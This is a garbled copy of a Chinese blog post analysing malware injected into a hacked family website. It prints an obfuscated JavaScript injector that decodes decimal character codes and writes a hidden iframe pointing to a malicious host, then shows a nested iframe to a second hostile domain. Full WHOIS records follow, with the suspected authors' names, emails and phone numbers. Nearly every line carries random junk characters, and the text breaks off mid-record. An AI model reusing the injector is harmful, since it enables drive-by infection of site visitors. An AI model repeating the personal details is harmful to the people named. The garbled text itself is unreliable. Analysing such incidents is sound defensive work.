首发在我的博客里面,
;&Q8xC2 36154*q http://www.areway.cn/?p=175 \Gh]$sp n{dl-P fLj#+h-! 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
t{\FV@R ~VZ)LQ'7 <script>t=’60,105,102,114,97,109,101,
p$XL|1G*?H 32,115,114,99,61,104,116,116,112,58,47,47,
7(;M 102,114,101,101,46,117,45,117,117,117,46,99,
_L mDF8Q( 110,47,101,114,114,111,114,46,104,116,109,
X6jW mo8] 32,119,105,100,116,104,61,49,48,48,32,104,
.]+oE$,! 101,105,103,104,116,61,48,62,60,47,105,102,
Y%v?ROql 114,97,109,101,62′;
`)`J t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
d`D<PT(\ q<L>r?T[ <script>t=’60,105,102,114,97,109,101,32,115,
HtUFl 114,99,61,104,116,116,112,58,47,47,102,114,
};[~>Mzl 101,101,46,117,45,117,117,117,46,99,110,47,
| I_,;c 101,114,114,111,114,46,104,116,109,32,119,
<KF|QE 105,100,116,104,61,49,48,48,32,104,101,105,
(|_1ku3! 103,104,116,61,48,62,60,47,105,102,114,97,
#?)g? u%g= 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
SomA`y+ERn document.write(t);</script>
F V8K_xj M),i4a?2 <html xmlns=”
wu5]S)?* http://www.w3.org/1999/xhtml Pa%;[hbn “>
&?m|PK) I <head>
1$Rua <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
@!0@f'}e <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
fcd\{1#u <title>首页 - 爱生活家庭网
eRkvNI fD3}s#M*G 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
Zgt:ZO 转换字符串后的大概内容是(谁点击后果自付):
9(>]6|XS <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
kB-%T66\ +H5=zf2 查询玉米u-uuu.cn的详细信息:
?\MvAG7Y Domain Name: u-uuu.cn
xc.(-g[ ROID: 20070901s10001s64972306-cn
V @A+d[ Domain Status: ok
\2(Uqf#_ Registrant Organization: 王雷
`9a %vN Registrant Name: 王雷
Fp>iwdjFg Administrative Email:
czlovexs@126.com h}&WBN Sponsoring Registrar: 北京万网志成科技有限公司
T8&
kxp Name Server:ns.yovole.com
$Hcp.J[O Name Server:ns1.yovole.com
8W$uw~|dw Registration Date: 2007-09-01 17:54
ezRhSN? Expiration Date: 2008-09-01 17:54
-1Acprr 最后PING了一下地址 都没有什么….
3n;UXYJ% hj@< wU 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
gs)wQgJ [ <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
!|hxr#q=4 <script language=”javascript” src=”
t\J5np http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script QiB^U^f >
q:4 51 C 这个玉米应该有可能是木马作者的:
6/^$SWd2 foafau.info的详细信息:
iaAVGgA9+ Access to INFO WHOIS information is provided to assist persons in
gUf-1#g4\` determining the contents of a domain name registration record in the
^vXMX^* Afilias registry database. The data in this record is provided by
}gQ FWT Afilias Limited for informational purposes only, and Afilias does not
Xx_v>Jn! guarantee its accuracy. This service is intended only for query-based
Y !e access. You agree that you will use this data only for lawful purposes
0|<ER3xkx and that, under no circumstances will you use this data to: (a) allow,
Kh<xQ:eMy enable, or otherwise support the transmission by e-mail, telephone, or
4G`7]< facsimile of mass unsolicited, commercial advertising or solicitations
uMl.}t2uYu to entities other than the data recipient’s own existing customers; or
gBQK (b) enable high volume, automated, electronic processes that send
=e'b*KTL, queries or data to the systems of Registry Operator, a Registrar, or
= h,6/cs Afilias except as reasonably necessary to register domain names or
5$o]D modify existing registrations. All rights reserved. Afilias reserves
>S4klW=*I the right to modify these terms at any time. By submitting this query,
%a%x`S3 you agree to abide by this policy.
N S*e<9 Domain ID:D22418703-LRMS
iM;7V*u Domain Name:FOAFAU.INFO
?I{pv4G: Created On:20-Nov-2007 16:05:42 UTC
Fm(~Vt;%u Last Updated On:20-Nov-2007 16:05:44 UTC
nQ4 s Expiration Date:20-Nov-2008 16:05:42 UTC
9 p6QNDp Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
r|t;# Status:CLIENT DELETE PROHIBITED
t2Dx$vT*& Status:CLIENT RENEW PROHIBITED
jE!<]
Status:CLIENT TRANSFER PROHIBITED
B. Rc s Status:CLIENT UPDATE PROHIBITED
p!^.;c Status:TRANSFER PROHIBITED
2 2K:[K Registrant ID:GODA-040110615
DJ?kQ Registrant Name:liu hong
8s6~l.v Registrant Organization:
r8\"'4B1 Registrant Street1:beijing
`9QvokD Registrant Street2:
ad^7t<a}< Registrant Street3:
\a]JH\T)Q Registrant City:beijing
bl. y4 Registrant State/Province:
eekp&H$'s Registrant Postal Code:100000
.a._WZF Registrant Country:CN
'`g#Zo Registrant Phone:+86.860108888777
,L ;ueAo Registrant Phone Ext.:
'V";"Ei Registrant FAX:
j)IXe 0dMC Registrant FAX Ext.:
:A%|'HxH3 Registrant Email:bbbshiji@163.com
Sc
Uh
-y_ Admin ID:GODA-240110615
iHy=92/Ww Admin Name:liu hong
rbl EyCR Admin Organization:
&6%%_Lw$ Admin Street1:beijing
=fmM=@!$< Admin Street2:
=C{)i@ + Admin Street3:
MONfA;64/ Admin City:beijing
b X.S` Admin State/Province:
My'u('Q% Admin Postal Code:100000
?c712a ? Admin Country:CN
PM3kI\:)m Admin Phone:+86.860108888777
jbx@ty Admin Phone Ext.:
\sB
a Admin FAX:
*:r@-=M3= Admin FAX Ext.:
;WX)g&19x Admin Email:bbbshiji@163.com
L{fKZ Billing ID:GODA-340110615
r )8[LN- Billing Name:liu hong
`I+G7KK Billing Organization:
vt0XCUnK Billing Street1:beijing
{KJ !rT Billing Street2:
6 R}]RuFQ Billing Street3:
JSXudz5c Billing City:beijing
,f0|eu> Billing State/Province:
j'Ry.8} Billing Postal Code:100000
g.yr)
LHt0 Billing Country:CN
K3jKOV8 Billing Phone:+86.860108888777
] h3~>8< Billing Phone Ext.:
,$irJz F Billing FAX:
rlSar$ Billing FAX Ext.:
TJS/ O~= Billing Email:bbbshiji@163.com
Zt:.+.dV Tech ID:GODA-140110615
lUWX[, Tech Name:liu hong
le%&r